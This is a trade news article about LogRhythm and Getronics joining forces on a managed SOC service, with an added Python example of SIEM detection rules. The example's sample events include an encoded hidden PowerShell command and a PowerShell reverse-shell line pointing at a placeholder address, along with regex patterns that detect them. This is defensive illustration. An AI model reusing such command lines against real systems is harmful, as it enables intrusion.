LogRhythm and Getronics partner for comprehensive new SOC solution

Customers benefit from faster and more accurate incident identification and mitigation.

Wednesday, 16th December 2020, by Phil Alsop

LogRhythm, the company powering today’s security operations centres (SOCs), and Getronics, the global IT services group, have announced a further commitment to the partnership that sees LogRhythm’s industry-leading SIEM solution integrated into Getronics’ managed security offerings globally.

The formal partnership allows the companies to tightly integrate LogRhythm’s SIEM solution – winner of SC Awards Europe 2020, Best SIEM Solution – with Getronics’ data processing and storage, located in the EU and meeting GDPR regulatory requirements. The standard Getronics offering is a highly cost-efficient, multi-tenant solution hosted in a dedicated cloud. On-premises deployments are available for clients with specific needs.

Getronics’ security operations centre, located in Barcelona, is underpinned by LogRhythm’s collection, parsing, processing and long-term storage of logs from a wide range of log sources, with support for over 850 log source types (such as Windows, Linux, syslog, cloud and flow data) and the possibility to create custom parsers to extend this.

LogRhythm’s Machine Data Intelligence framework, with over 600,000 normalisation rules, provides scalable and efficient normalisation. To feed into this, Getronics has developed a Configuration Management Framework to map full lifecycle requirements for log generation, collection and processing that is both effective and mindful of cost.

In turn, the output from rule-based processing identifies specific security events and triggers alarms using Getronics’ MITRE ATT&CK-based detection playbook. This transforms a data lake of billions of logs into a manageable number of alarms for enrichment with threat intelligence and processing by dedicated security analysts.
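To make the "billions of logs into a manageable number of alarms" step concrete, here is a small added example of rule-based processing, written for this page and not code from LogRhythm or Getronics. It runs three ATT&CK-tagged rules over a batch of constructed, already-normalised Windows Security events (the field names, rule IDs, severities, threshold and threat-intelligence watchlist are all assumptions for illustration), de-duplicates matches into one alarm per rule and grouping key, applies a count threshold so that a single failed logon stays noise while five from one source become an alarm, and then enriches each alarm from the watchlist before handing it to an analyst:

```python
"""Added example (not LogRhythm's or Getronics' code): a minimal rule-based
pass that turns a batch of normalised log records into a few ATT&CK-tagged,
de-duplicated alarms, then enriches them from a constructed watchlist."""
import re
from dataclasses import dataclass
from typing import Callable

# Constructed, already-normalised Windows Security events. Field names are
# hypothetical; a real SIEM's normalised schema differs.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ts": "2020-12-16T09:00:01", "host": "WS01", "user": "alice", "event_id": 4624, "src_ip": "10.0.0.5"},
    {"ts": "2020-12-16T09:00:05", "host": "WS01", "user": "alice", "event_id": 4688, "image": PS,
     "cmdline": "powershell.exe -NoP -W Hidden -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"ts": "2020-12-16T09:00:06", "host": "WS01", "user": "alice", "event_id": 4688, "image": PS,
     "cmdline": "powershell.exe -nop -c \"$c=New-Object Net.Sockets.TcpClient('203.0.113.10',4444)\""},
    # Five failed logons for one account from one source: noise one by one, an alarm together.
    *[{"ts": f"2020-12-16T09:01:{i:02d}", "host": "DC01", "user": "svc-backup", "event_id": 4625,
       "src_ip": "10.0.0.77"} for i in range(5)],
    {"ts": "2020-12-16T09:02:00", "host": "WS02", "user": "bob", "event_id": 4688,
     "image": r"C:\Program Files\Microsoft Office\WINWORD.EXE", "cmdline": "WINWORD.EXE /n report.docx"},
]

# Constructed threat-intelligence watchlist (not real indicators).
WATCHLIST = {"203.0.113.10": "constructed TI entry: reported C2 address"}

@dataclass
class Rule:
    rule_id: str
    technique: str                 # MITRE ATT&CK technique ID
    severity: int                  # 1..100, higher is worse (assumed scale)
    group_by: tuple                # fields that define one alarm (de-duplication key)
    match: Callable[[dict], bool]
    threshold: int = 1             # matches of one key needed before an alarm is raised

def _is_powershell(e):
    return e.get("event_id") == 4688 and e.get("image", "").lower().endswith("powershell.exe")

ENCODED_RE = re.compile(r"(?i)\s-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{16,}")
REVSHELL_RE = re.compile(r"(?i)Net\.Sockets\.TcpClient")

RULES = [
    Rule("PS-ENCODED", "T1059.001", 70, ("host", "user"),
         lambda e: _is_powershell(e) and bool(ENCODED_RE.search(e.get("cmdline", "")))),
    Rule("PS-REVSHELL", "T1059.001", 90, ("host", "user"),
         lambda e: _is_powershell(e) and bool(REVSHELL_RE.search(e.get("cmdline", "")))),
    Rule("AUTH-BRUTE", "T1110", 60, ("host", "user", "src_ip"),
         lambda e: e.get("event_id") == 4625, threshold=5),
]

IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

def enrich(alarm):
    """Attach watchlist hits found in the alarm's evidence and raise its severity."""
    seen = set()
    for e in alarm["evidence"]:
        seen.update(IP_RE.findall(e.get("cmdline", "")))
        if e.get("src_ip"):
            seen.add(e["src_ip"])
    hits = {ip: WATCHLIST[ip] for ip in seen if ip in WATCHLIST}
    if hits:
        alarm["intel"] = hits
        alarm["severity"] = min(100, alarm["severity"] + 10)
    return alarm

def run_rules(events, rules):
    """Evaluate every rule on every event; one alarm per (rule, group key)."""
    by_id = {r.rule_id: r for r in rules}
    alarms = {}
    for e in events:
        for r in rules:
            if not r.match(e):
                continue
            key = (r.rule_id, tuple(e.get(f) for f in r.group_by))
            a = alarms.setdefault(key, {"rule": r.rule_id, "technique": r.technique,
                                        "severity": r.severity, "first_seen": e["ts"],
                                        "last_seen": e["ts"], "count": 0, "evidence": [],
                                        **{f: e.get(f) for f in r.group_by}})
            a["count"] += 1
            a["last_seen"] = e["ts"]
            a["evidence"].append(e)   # raw records travel with the alarm for the analyst
    raised = [enrich(a) for a in alarms.values() if a["count"] >= by_id[a["rule"]].threshold]
    return sorted(raised, key=lambda a: -a["severity"])

if __name__ == "__main__":
    for a in run_rules(SAMPLE_EVENTS, RULES):
        print(a["severity"], a["rule"], a["technique"], a["host"], a["user"], a["count"], a.get("intel", ""))
```

Nine events go in and three alarms come out, each carrying its ATT&CK technique, its grouping fields, first and last seen times and the raw evidence records; the reverse-shell alarm is pushed to the top of the queue because its destination address hits the watchlist. The benign Word launch and the successful logon produce nothing, which is the point of the rule-and-threshold stage.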

The output also provides the insights needed to report against a wide range of compliance frameworks, including Getronics’ advanced ISO 27001 report, which provides both top-level control outcome summaries and highly granular drill-down on individual control data with analyst findings.

“We are excited to extend this partnership with LogRhythm, one of the most successful and fastest growing security operations companies of our time. Together we are much more than the sum of our parts, and we will innovate and build capabilities for the benefit of Getronics customers,” said Harsha Gowda, CTO of Getronics.

“We pride ourselves on having the most advanced NextGen SIEM platform, which offers comprehensive analytics and security orchestration, automation and response (SOAR) in a single platform. The integration of our award-winning SIEM with Getronics’ SOC will open up a range of exciting security benefits for Getronics’ customers both now and in the future,” said Martin Landless, VP sales Europe at LogRhythm.

The combination of Getronics’ 24x7 security service offerings and the market-leading LogRhythm platform offers customers the peace of mind that their environments are being continually monitored by a team of experts using cutting-edge toolsets. Investment in the platform and people is managed by Getronics, reducing capital outlay and removing the recruitment and retention headache of employing security staff, thereby delivering a fully managed SIEM solution.

The extensible and efficient service ensures false-positive alarms are rapidly eliminated, with the remaining investigations being raised in integrated LogRhythm case management, with logs and analyst findings attached in an evidence locker. Dedicated incident handlers then apply pre-planned courses of action, adapted to the client-specific context as required, to rapidly contain, mitigate and eradicate any breach.

Security orchestration and automated response is provided through LogRhythm’s ‘SmartResponse’ functionality, which supports both automatic scripted responses triggered at machine speed by alarms and optional scripted responses that an analyst or incident handler triggers manually.

The solution includes an option for network traffic analysis including full packet capture and layer 2 to 7 deep packet inspection and analysis, with automatic identification of over 3,500 applications, fully integrated with the SIEM. This is presented as the gold standard in network detection and forensics, allowing not just identification of unwanted traffic such as BitTorrent but also advanced functions such as file reconstruction to determine exactly what a user sent or received, or identifying attacker techniques such as a PowerShell reverse shell.